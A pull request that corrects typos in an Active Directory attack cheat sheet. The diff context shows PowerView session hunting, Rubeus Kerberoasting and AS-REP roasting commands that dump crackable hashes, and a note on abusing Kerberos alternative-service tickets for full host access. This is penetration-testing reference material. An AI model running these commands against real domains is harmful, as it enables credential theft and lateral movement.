### PR TITLE
Fixed typos in README.md

### DIFF
--- a/README.md
+++ b/README.md
@@ -224,7 +224,7 @@ This cheat sheet is inspired by the [PayloadAllTheThings](https://github.com/swi
   #Find local admins on all machines of the domain
   Find-DomainLocalGroupMember -Verbose
 
-  #Find computers were a Domain Admin OR a spesified user has a session
+  #Find computers were a Domain Admin OR a specified user has a session
   Find-DomainUserLocation | Select-Object UserName, SessionFromName
 
   #Confirming admin access
@@ -251,7 +251,7 @@ This cheat sheet is inspired by the [PayloadAllTheThings](https://github.com/swi
   ```powershell
   Get-ADUser -Filter * -Identity <user> -Properties *
 
-  #Get a spesific "string" on a user's attribute
+  #Get a specific "string" on a user's attribute
   Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
   ```
 
@@ -619,7 +619,7 @@ _WUT IS DIS?:_ \
 - Rubeus:
 
   ```powershell
-  #Kerberoasting and outputing on a file with a spesific format
+  #Kerberoasting and outputing on a file with a specific format
   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
 
   #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
@@ -628,7 +628,7 @@ _WUT IS DIS?:_ \
   #Kerberoast AES enabled accounts
   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
 
-  #Kerberoast spesific user account
+  #Kerberoast specific user account
   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
 
   #Kerberoast by specifying the authentication credentials
@@ -662,7 +662,7 @@ Get-DomainUser -PreauthNotRequired -Verbose
 - And finally execute the attack using the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) tool.
 
   ```powershell
-  #Get a spesific Accounts hash:
+  #Get a specific Accounts hash:
   Get-ASREPHash -UserName <UserName> -Verbose
 
   #Get any ASREPRoastable Users hashes:
@@ -675,10 +675,10 @@ Get-DomainUser -PreauthNotRequired -Verbose
   #Trying the attack for all domain users
   Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
 
-  #ASREPRoast spesific user
+  #ASREPRoast specific user
   Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
 
-  #ASREPRoast users of a spesific OU (Organization Unit)
+  #ASREPRoast users of a specific OU (Organization Unit)
   Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
   ```
 
@@ -833,7 +833,7 @@ Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateu
 
 Now we can access the service as the impersonated user!
 
-:triangular_flag_on_post: **What if we have delegation rights for only a spesific SPN? (e.g TIME):**
+:triangular_flag_on_post: **What if we have delegation rights for only a specific SPN? (e.g TIME):**
 
 In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
 


### PR DESCRIPTION
There are many occurrences of `spesific`, `spesified` or similiar in the README. This pull request fixes them.